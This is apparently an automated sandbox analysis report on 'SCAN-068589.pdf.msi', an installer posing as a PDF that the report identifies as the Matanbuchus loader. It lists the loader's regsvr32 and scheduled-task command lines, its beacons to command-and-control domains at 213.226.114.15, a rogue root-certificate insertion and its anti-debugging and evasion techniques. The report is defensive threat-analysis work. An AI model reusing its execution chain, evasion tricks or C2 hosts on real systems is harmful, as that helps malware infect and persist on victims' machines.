ev=eyIzQ0VrIjoiMHhxQUZMdkRyRVNYd3NPdzQwR3BnbEU1Q0QyOXpOV0diT01MT1NRMXdLSnBlYytMSXgwPSIsIjNmZTExIjoib2tYTlFBPT0iLCIzbTd4IjoiMnhDWkdMaz0iLCJEUzJ4IjoickVEVU03NmYiLCJFTGoiOiIzalc2UWVNPSIsIkVvNiI6IjJ4T0dHTEtIIiwiRnRvIjoicmc9PSIsIkxvcyI6WyIvQXlFRnAyQnRpN3d4Y1dzNlYyTW13SkFVVTNVcm9PRElJVnpkQTlHdnVNTklnPT0iXSwiTlNleURYIjoiMUNlUkNKT3oiLCJRNlg2IjoiMnppMkpJVEdyaTQ9IiwiVnoiOiIyVTZvSnI2Rm1nTEE4dkNSL3hxcWdDODlIQ0tmL0pMRExLRUlLMHB3aXVrPSIsImNCRiI6IjN6ZlpOK1BHdkMrYXc1bnZ2MWpRK2pvPSIsImYxZGEiOiJ4aWkxUFpXK3JVRG53Zz09IiwidFciOiJxa0xGUk9QZiIsIndQNiI6IjdFWGFSZm5iIiwiemtDNyI6IiJ9
Source: unknown DNS traffic detected: queries for: telemetrysystemcollection.com
Source: global traffic HTTP traffic detected: GET /m8YYdu/mCQ2U9/auth.aspx HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16)Host: telemetrysystemcollection.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /m8YYdu/mCQ2U9/home.aspx HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16)Host: telemetrysystemcollection.comCache-Control: no-cache
Source: unknown HTTPS traffic detected: 213.226.114.15:443 -> 192.168.2.22:49180 version: TLS 1.2
Deletes files inside the Windows folder
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\68bd58.ipi Jump to behavior
Creates files inside the system directory
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\68bd57.msi Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E465E60 12_2_6E465E60
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E458C50 12_2_6E458C50
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E45FDC5 12_2_6E45FDC5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4585F0 12_2_6E4585F0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4662FA 12_2_6E4662FA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E45E2BD 12_2_6E45E2BD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4690BC 12_2_6E4690BC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4691DC 12_2_6E4691DC
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: String function: 6E45ADD0 appears 35 times
Abnormal high CPU Usage
Source: C:\Windows\System32\msiexec.exe Process Stats: CPU usage > 98%
PE / OLE file has an invalid certificate
Source: SCAN-068589.pdf.msi Static PE information: invalid certificate
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\x86\5507.nls F8CC2CF36E193774F13C9C5F23AB777496DCD7CA588F4F73B45A7A5FFA96145E
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Windows\System32\msiexec.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\SCAN-068589.pdf.msi"
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {4CFB7DD2-D1A8-412D-8316-3EFD3FFEBE4B} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls"
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls" Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\AdobeFontPack Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\~DF6CBE8E5B62F6E221.TMP Jump to behavior
Source: classification engine Classification label: mal64.troj.evad.winMSI@13/12@9/1
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected

Data Obfuscation
barindex
Yara detected Matanbuchus
Source: Yara match File source: 12.2.regsvr32.exe.6e410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\AdobeFontPack\main.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\x86\5507.nls, type: DROPPED
Registers a DLL
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\SysWOW64\regsvr32.exe File created: C:\Users\user\AppData\Local\x86\5507.nls Jump to dropped file
Drops PE files
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\AdobeFontPack\main.dll Jump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exe File created: C:\Users\user\AppData\Local\x86\5507.nls Jump to dropped file
Modifies existing windows services
Source: C:\Windows\System32\msiexec.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\SystemRestore Jump to behavior
Creates or modifies windows services
Source: C:\Windows\System32\msiexec.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\VssapiPublisher Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49183 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49183
Source: unknown Network traffic detected: HTTP traffic on port 49184 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49184
Source: unknown Network traffic detected: HTTP traffic on port 49185 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49185
Source: unknown Network traffic detected: HTTP traffic on port 49186 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49186
Source: unknown Network traffic detected: HTTP traffic on port 49187 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49187
Source: unknown Network traffic detected: HTTP traffic on port 49188 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49188
Source: unknown Network traffic detected: HTTP traffic on port 49189 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49189
Source: unknown Network traffic detected: HTTP traffic on port 49190 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49190
Stores large binary data to the registry
Source: C:\Windows\System32\msiexec.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\msiexec.exe TID: 568 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 2104 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 2716 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2912 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2912 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2912 Thread sleep time: -480000s >= -30000s Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 2384 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1056 Thread sleep time: -50000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\regsvr32.exe Last function: Thread delayed
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E462F53 FindFirstFileExW, 12_2_6E462F53
Source: C:\Windows\SysWOW64\regsvr32.exe Thread delayed: delay time: 80000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: regsvr32.exe, 00000007.00000003.1133918738.0000000003CE0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1146769824.0000000003849000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1115719703.00000000036E1000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1145675785.0000000003DB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1138782009.0000000003DA0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: zyjF6yeosi3Z3BbszxHZ5k7PONzRIIxJBPMbNo3u0Vg2zQeMu4Rk8CfGv3TUFN4O
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E45D490 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_6E45D490
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E463FE0 GetProcessHeap, 12_2_6E463FE0
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E457CAA mov eax, dword ptr fs:[00000030h] 12_2_6E457CAA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E457CAA mov ecx, dword ptr fs:[00000030h] 12_2_6E457CAA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E457CAA mov ecx, dword ptr fs:[00000030h] 12_2_6E457CAA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E457CAA mov ecx, dword ptr fs:[00000030h] 12_2_6E457CAA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E416570 mov ecx, dword ptr fs:[00000030h] 12_2_6E416570
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4168E0 mov ecx, dword ptr fs:[00000030h] 12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h] 12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h] 12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h] 12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h] 12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h] 12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h] 12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h] 12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h] 12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41DF70 mov edx, dword ptr fs:[00000030h] 12_2_6E41DF70
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E45EFD5 mov eax, dword ptr fs:[00000030h] 12_2_6E45EFD5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E458C50 mov eax, dword ptr fs:[00000030h] 12_2_6E458C50
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E458C50 mov ecx, dword ptr fs:[00000030h] 12_2_6E458C50
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41ECD0 mov ecx, dword ptr fs:[00000030h] 12_2_6E41ECD0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41ECD0 mov eax, dword ptr fs:[00000030h] 12_2_6E41ECD0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41ECD0 mov eax, dword ptr fs:[00000030h] 12_2_6E41ECD0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E415580 mov eax, dword ptr fs:[00000030h] 12_2_6E415580
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E415580 mov edx, dword ptr fs:[00000030h] 12_2_6E415580
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E415580 mov edx, dword ptr fs:[00000030h] 12_2_6E415580
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E415580 mov edx, dword ptr fs:[00000030h] 12_2_6E415580
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E415580 mov edx, dword ptr fs:[00000030h] 12_2_6E415580
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov eax, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov eax, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov ecx, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov eax, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov ecx, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov ecx, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov eax, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov ecx, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov eax, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov edx, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov edx, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov ecx, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov ecx, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov eax, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E462B7D mov eax, dword ptr fs:[00000030h] 12_2_6E462B7D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E418300 mov ecx, dword ptr fs:[00000030h] 12_2_6E418300
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E418300 mov ecx, dword ptr fs:[00000030h] 12_2_6E418300
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E418300 mov ecx, dword ptr fs:[00000030h] 12_2_6E418300
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E418300 mov eax, dword ptr fs:[00000030h] 12_2_6E418300
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E418300 mov eax, dword ptr fs:[00000030h] 12_2_6E418300
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E418300 mov ecx, dword ptr fs:[00000030h] 12_2_6E418300
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E418300 mov edx, dword ptr fs:[00000030h] 12_2_6E418300
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E411300 mov eax, dword ptr fs:[00000030h] 12_2_6E411300
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E411300 mov ecx, dword ptr fs:[00000030h] 12_2_6E411300
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E420BEE mov edx, dword ptr fs:[00000030h] 12_2_6E420BEE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41A390 mov eax, dword ptr fs:[00000030h] 12_2_6E41A390
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41E160 mov ecx, dword ptr fs:[00000030h] 12_2_6E41E160
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41E160 mov eax, dword ptr fs:[00000030h] 12_2_6E41E160
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41E160 mov edx, dword ptr fs:[00000030h] 12_2_6E41E160
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41E160 mov eax, dword ptr fs:[00000030h] 12_2_6E41E160
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E421160 mov eax, dword ptr fs:[00000030h] 12_2_6E421160
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E419910 mov ecx, dword ptr fs:[00000030h] 12_2_6E419910
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E419910 mov eax, dword ptr fs:[00000030h] 12_2_6E419910
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E419910 mov eax, dword ptr fs:[00000030h] 12_2_6E419910
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4589F0 mov ecx, dword ptr fs:[00000030h] 12_2_6E4589F0
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E45AF5D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_6E45AF5D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E45D490 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_6E45D490
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E45ACAD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_6E45ACAD

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: collectiontelemetrysystem.com
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 213.226.114.15 48195 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: telemetrysystemcollection.com
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E45AACC cpuid 12_2_6E45AACC
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E45AE18 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 12_2_6E45AE18
Adds / modifies Windows certificates
Source: C:\Windows\System32\msiexec.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 647225 Sample: SCAN-068589.pdf.msi Startdate: 16/06/2022 Architecture: WINDOWS Score: 64 35 Yara detected Matanbuchus 2->35 37 Uses known network protocols on non-standard ports 2->37 7 msiexec.exe 83 25 2->7         started        10 taskeng.exe 1 2->10         started        12 msiexec.exe 3 2->12         started        process3 file4 29 C:\Users\user\AppData\Local\...\main.dll, PE32 7->29 dropped 14 regsvr32.exe 7->14         started        16 wscript.exe 7->16         started        18 regsvr32.exe 10->18         started        process5 process6 20 regsvr32.exe 2 11 14->20         started        25 regsvr32.exe 18->25         started        dnsIp7 31 collectiontelemetrysystem.com 213.226.114.15, 443, 48195, 49179 RETN-ASEU Russian Federation 20->31 33 telemetrysystemcollection.com 20->33 27 C:\Users\user\AppData\Local\x86\5507.nls, PE32 20->27 dropped 39 System process connects to network (likely due to code injection or exploit) 20->39 41 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 20->41 file8 signatures9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
213.226.114.15
 telemetrysystemcollection.com Russian Federation
9002 RETN-ASEU true

Contacted Domains

Name IP Active
telemetrysystemcollection.com 213.226.114.15 true
collectiontelemetrysystem.com 213.226.114.15 true

